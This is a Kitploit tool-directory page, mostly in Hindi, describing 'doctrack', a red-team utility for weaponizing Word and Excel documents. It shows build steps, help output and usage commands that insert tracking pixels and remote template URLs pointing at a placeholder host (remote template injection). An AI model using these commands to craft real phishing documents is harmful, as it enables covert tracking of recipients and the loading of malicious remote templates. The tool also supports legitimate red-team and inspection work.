Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
doctrack — Office Open XML दस्तावेज़ों में हेरफेर और हथियार बनाने का उपकरण। | Kitploit
उपकरण/GitHubGitHub/wavvs/doctrack
फ़िशिंग उपकरणपेलोड जनरेशनजानकारी एकत्र करनारेड टीमिंग
GitHubwavvs/doctrack

doctrack

Office Open XML दस्तावेज़ों में हेरफेर और हथियार बनाने का उपकरण।

रिपॉजिटरी देखें
721843 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Doctrack

Office Open XML दस्तावेज़ों को हेरफेर और हथियार बनाने का उपकरण।

विशेषताएँ

  • Office Open XML दस्तावेज़ बनाएँ (Word, Excel)
  • ट्रैकिंग पिक्सेल और UNC पथ सम्मिलित करें
  • रिमोट टेम्पलेट इंजेक्शन
  • CustomXML भाग सम्मिलित करें
  • बाहरी लक्ष्य URL, मेटाडेटा और Custom XML भागों का निरीक्षण करें

स्थापना

आपको .Net 6.0 डाउनलोड करने की आवश्यकता होगी। फिर, Windows पर एक एकल बाइनरी बनाने के लिए:

root@kitploit:~
$ git clone https://github.com/wavvs/doctrack.git
$ cd doctrack/
$ dotnet publish -r win-x64 -c Release /p:PublishSingleFile=true

Linux पर:

root@kitploit:~
$ dotnet publish -r linux-x64 -c Release /p:PublishSingleFile=true

उपयोग

root@kitploit:~
$ doctrack --help
Tool to manipulate and weaponize Office Open XML documents.

  -i, --input          Input filename. If doesn't exist, new file is created.
  -o, --output         Output filename. If not set, document is saved as --input
                       file.
  -m, --metadata       Metadata to supply (JSON file).
  -u, --url            URL to insert.
  -e, --template       (Default: false) If set, enables template URL injection.
  -s, --inspect        (Default: false) Inspect document.
  -c, --custom-part    Insert a Custom XML part (XML file)
  --help               Display this help screen.

एक Word दस्तावेज़ बनाएँ और दस्तावेज़ मेटाडेटा बदलें:

root@kitploit:~
$ doctrack -i test.docx -m metadata.json

ट्रैकिंग पिक्सेल सम्मिलित करें और दस्तावेज़ मेटाडेटा बदलें:

root@kitploit:~
$ doctrack -i test.docx -o test.docx --metadata metadata.json --url http://test.url/image.png

रिमोट टेम्पलेट URL सम्मिलित करें (उर्फ रिमोट टेम्पलेट इंजेक्शन):

root@kitploit:~
$ doctrack -i test.docx -o test.docx --url http://test.url/template.dotm --template

एक Custom XML भाग सम्मिलित करें:

root@kitploit:~
$ doctrack -i test.docx -o test.docx -c part.xml

बाहरी लक्ष्य URL, मेटाडेटा और Custom XML भागों का निरीक्षण करें:

root@kitploit:~
$ doctrack -i test.docx --inspect
[External targets]
Part: /word/document.xml, ID: R8783bc77406d476d, URI: http://test.url/image.png
Part: /word/settings.xml, ID: R33c36bdf400b44f6, URI: http://test.url/template.dotm

[Metadata]
Creator: wavvs
Title: doctrack
Subject:
Category:
Keywords:
Description:
ContentType:
ContentStatus:
Version:
Revision:
Created: 13.10.2020 23:20:39
Modified: 13.10.2020 23:20:39
LastModifiedBy:
LastPrinted: 13.10.2020 23:20:39
Language:
Identifier:

[CustomXML Parts]
Part: /customXML/item.xml (25 bytes)
टूल डाउनलोड करें